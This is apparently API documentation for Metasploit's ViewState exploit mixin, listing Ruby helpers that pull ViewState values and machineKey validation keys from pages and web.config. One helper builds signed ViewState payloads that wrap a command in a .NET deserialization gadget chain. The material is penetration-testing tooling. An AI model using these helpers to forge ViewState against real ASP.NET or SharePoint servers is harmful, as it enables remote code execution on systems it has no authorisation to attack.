Module: Msf::Exploit::ViewState

Included in:
Remote::HTTP::Sharepoint
Defined in:
lib/msf/core/exploit/view_state.rb

Instance Method Summary collapse

Instance Method Details

#can_sign_viewstate?(encoded_viewstate, extra: '', algo: 'sha1', key: '') ⇒ Boolean

Returns:

  • (Boolean) 


72
73
74
75
76
77
 
# File 'lib/msf/core/exploit/view_state.rb', line 72

def can_sign_viewstate?(encoded_viewstate, extra: '', algo: 'sha1', key: '')
  Rex::Exploit::ViewState.can_sign_viewstate?(encoded_viewstate, extra: extra, algo: algo, key: key)
rescue Rex::Exploit::ViewState::Error => error
  vprint_error("#{error.class.name}: #{error.message}")
  return false
end

#decode_viewstate(encoded_viewstate, algo: 'sha1') ⇒ Object 



61
62
63
64
65
66
67
68
69
70
 
# File 'lib/msf/core/exploit/view_state.rb', line 61

def decode_viewstate(encoded_viewstate, algo: 'sha1')
  decoded = Rex::Exploit::ViewState.decode_viewstate(encoded_viewstate, algo: algo)

  vprint_error('Could not parse ViewState data') unless decoded[:data].present?
  vprint_error('Could not parse ViewState HMAC') unless decoded[:hmac].present?
  decoded
rescue Rex::Exploit::ViewState::Error => error
  vprint_error("#{error.class.name}: #{error.message}")
  return { data: nil, hmac: nil }
end

#extract_viewstate(html) ⇒ Object

Extract __VIEWSTATE from HTML



80
81
82
 
# File 'lib/msf/core/exploit/view_state.rb', line 80

def extract_viewstate(html)
  html.at('//input[@id = "__VIEWSTATE"]/@value')&.text
end

#extract_viewstate_generator(html) ⇒ Object

Extract __VIEWSTATEGENERATOR from HTML



85
86
87
 
# File 'lib/msf/core/exploit/view_state.rb', line 85

def extract_viewstate_generator(html)
  html.at('//input[@id = "__VIEWSTATEGENERATOR"]/@value')&.text
end

#extract_viewstate_validation_key(web_config) ⇒ Object

Extract validationKey from web.config



90
91
92
 
# File 'lib/msf/core/exploit/view_state.rb', line 90

def extract_viewstate_validation_key(web_config)
  web_config.at('//machineKey/@validationKey')&.text
end

#generate_viewstate(data, extra: '', algo: 'sha1', key: '') ⇒ Object 



53
54
55
 
# File 'lib/msf/core/exploit/view_state.rb', line 53

def generate_viewstate(data, extra: '', algo: 'sha1', key: '')
  Rex::Exploit::ViewState.generate_viewstate(data, extra: extra, algo: algo, key: key)
end

#generate_viewstate_hmac(data, algo: 'sha1', key: '') ⇒ Object 



57
58
59
 
# File 'lib/msf/core/exploit/view_state.rb', line 57

def generate_viewstate_hmac(data, algo: 'sha1', key: '')
  Rex::Exploit::ViewState.generate_viewstate_hmac(data, algo: algo, key: key)
end

#generate_viewstate_payload(cmd, extra: '', algo: 'sha1', key: '') ⇒ Object 



43
44
45
46
47
48
49
50
51
 
# File 'lib/msf/core/exploit/view_state.rb', line 43

def generate_viewstate_payload(cmd, extra: '', algo: 'sha1', key: '')
  serialized_payload = Msf::Util::DotNetDeserialization.generate(
    cmd,
    gadget_chain: datastore['DotNetGadgetChain'].to_sym,
    formatter: :LosFormatter
  )

  generate_viewstate(serialized_payload, extra: extra, algo: algo, key: key)
end

#initialize(info = {}) ⇒ Object 



27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
 
# File 'lib/msf/core/exploit/view_state.rb', line 27

def initialize(info = {})
  super

  register_advanced_options([
    OptEnum.new(
      'DotNetGadgetChain',
      [
        true,
        '.NET gadget chain to use in ViewState',
        :TextFormattingRunProperties,
        Msf::Util::DotNetDeserialization.formatter_compatible_gadget_chains(:LosFormatter)
      ]
    )
  ])
end

#pack_viewstate_generator(hex_generator) ⇒ Object

Convenience method to convert __VIEWSTATEGENERATOR to binary



95
96
97
 
# File 'lib/msf/core/exploit/view_state.rb', line 95

def pack_viewstate_generator(hex_generator)
  [hex_generator.to_i(16)].pack('V')
end

#pack_viewstate_validation_key(hex_key) ⇒ Object

Convenience method to convert validationKey to binary



100
101
102
 
# File 'lib/msf/core/exploit/view_state.rb', line 100

def pack_viewstate_validation_key(hex_key)
  [hex_key].pack('H*')
end